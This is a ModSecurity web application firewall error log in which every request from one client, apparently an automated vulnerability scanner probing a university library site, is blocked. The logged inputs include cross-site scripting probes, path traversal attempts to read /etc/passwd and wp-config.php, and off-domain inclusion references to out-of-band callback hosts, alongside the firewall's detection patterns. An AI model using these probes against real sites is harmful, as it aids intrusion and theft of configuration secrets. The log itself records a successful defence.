[Tue Aug 29 11:55:52.605019 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb07mzxqrt3hmhp1.oast.site/ found within TX:1: cjmnijtjmimvgniikdb07mzxqrt3hmhp1.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent"] [unique_id "ZO16WMCo-f0AAApbUqoAAAAh"]
[Tue Aug 29 11:55:52.687358 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:plugin: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/whizz/plugins/delete-plugin.php"] [unique_id "ZO16WMCo-f0AAArB1r0AAAAV"]
[Tue Aug 29 11:55:53.801649 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0nkds7ideptqwy.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0nkds7ideptqwy.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss"] [unique_id "ZO16WcCo-f0AAAqY6MIAAAAr"]
[Tue Aug 29 11:55:53.856274 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:bgColor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:bgColor: _000000\\x22onload=\\x22prompt(1)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/Telerik.ReportViewer.axd"] [unique_id "ZO16WcCo-f0AAArC7acAAAAW"]
[Tue Aug 29 11:55:53.865720 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:msgId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')// found within ARGS:msgId: ';alert('document.domain')//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/carbon/admin/login.jsp"] [unique_id "ZO16WcCo-f0AAAq@sasAAAAM"]
[Tue Aug 29 11:55:55.671041 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO16W8Co-f0AAAq5@HYAAAAK"]
[Tue Aug 29 11:55:56.611029 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XMCo-f0AAAqY6NIAAAAr"]
[Tue Aug 29 11:55:56.663722 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: ax6zt\\x22><script>alert(document.domain)</script>y6uu6"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO16XMCo-f0AAArC7bsAAAAW"]
[Tue Aug 29 11:55:57.647302 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/db-backup/download.php"] [unique_id "ZO16XcCo-f0AAAq5@IcAAAAK"]
[Tue Aug 29 11:55:58.686923 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO16XsCo-f0AAArC7ccAAAAW"]
[Tue Aug 29 11:55:58.736671 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:p: <img src onerror=alert(/XSS/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XsCo-f0AAAq5@I8AAAAK"]
[Tue Aug 29 11:56:00.156897 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:wpbase: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/sourceafrica/js/window.php"] [unique_id "ZO16YMCo-f0AAAq5@JoAAAAK"]
[Tue Aug 29 11:56:00.572702 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:wlcms[_login_custom_js]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:wlcms[_login_custom_js]: alert(/XSS/);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16YMCo-f0AAApbUs4AAAAh"]
[Tue Aug 29 11:56:01.553075 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:hostname: \\x22)</script><script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO16YcCo-f0AAAqTv1gAAAAa"]
[Tue Aug 29 11:56:01.640337 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:username: test\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/goform/login_process"] [unique_id "ZO16YcCo-f0AAAqY6OYAAAAr"]
[Tue Aug 29 11:56:02.652213 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foruserlogin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foruserlogin: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/dolibarr/adherents/cartes/carte.php"] [unique_id "ZO16YsCo-f0AAAq5@KwAAAAK"]
[Tue Aug 29 11:56:02.708784 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keyword_search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: --!>\\x22  found within ARGS:keyword_search: --!>\\x22 autofocus onfocus=alert(/2Ue0IXhHNjNl9QMpplilzBsRqJA/);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/properties/"] [unique_id "ZO16YsCo-f0AAAqY6PAAAAAr"]
[Tue Aug 29 11:56:03.539830 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cat_id: 6\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO16Y8Co-f0AAAq@sd0AAAAM"]
[Tue Aug 29 11:56:03.605045 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:urls[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:urls[]: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16Y8Co-f0AAArC7eAAAAAW"]
[Tue Aug 29 11:56:04.553664 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/sap/public/bc/icf/logoff"] [unique_id "ZO16ZMCo-f0AAApa-SEAAAAg"]
[Tue Aug 29 11:56:04.593655 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:sortBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:sortBy: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16ZMCo-f0AAApbUuQAAAAh"]
[Tue Aug 29 11:56:04.732024 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:snum. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:snum: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/featurific-for-wordpress/cached_image.php"] [unique_id "ZO16ZMCo-f0AAArC7esAAAAW"]
[Tue Aug 29 11:56:05.530925 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/simpel-reserveren/edit.php"] [unique_id "ZO16ZcCo-f0AAArC7ewAAAAW"]
[Tue Aug 29 11:56:05.707981 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ID: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php"] [unique_id "ZO16ZcCo-f0AAApa-ScAAAAg"]
[Tue Aug 29 11:56:06.732862 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:submit: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php"] [unique_id "ZO16ZsCo-f0AAAqY6QYAAAAr"]
[Tue Aug 29 11:56:06.891947 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:title_az. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:title_az: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/title_az.php"] [unique_id "ZO16ZsCo-f0AAAq@sfoAAAAM"]
[Tue Aug 29 11:56:07.533332 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16Z8Co-f0AAAqeFjYAAAAx"]
[Tue Aug 29 11:56:08.562977 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/plugins/content/jw_allvideos/includes/download.php"] [unique_id "ZO16aMCo-f0AAArB1w8AAAAV"]
[Tue Aug 29 11:56:08.707972 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:count: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/goform/activate_process"] [unique_id "ZO16aMCo-f0AAApbUwMAAAAh"]
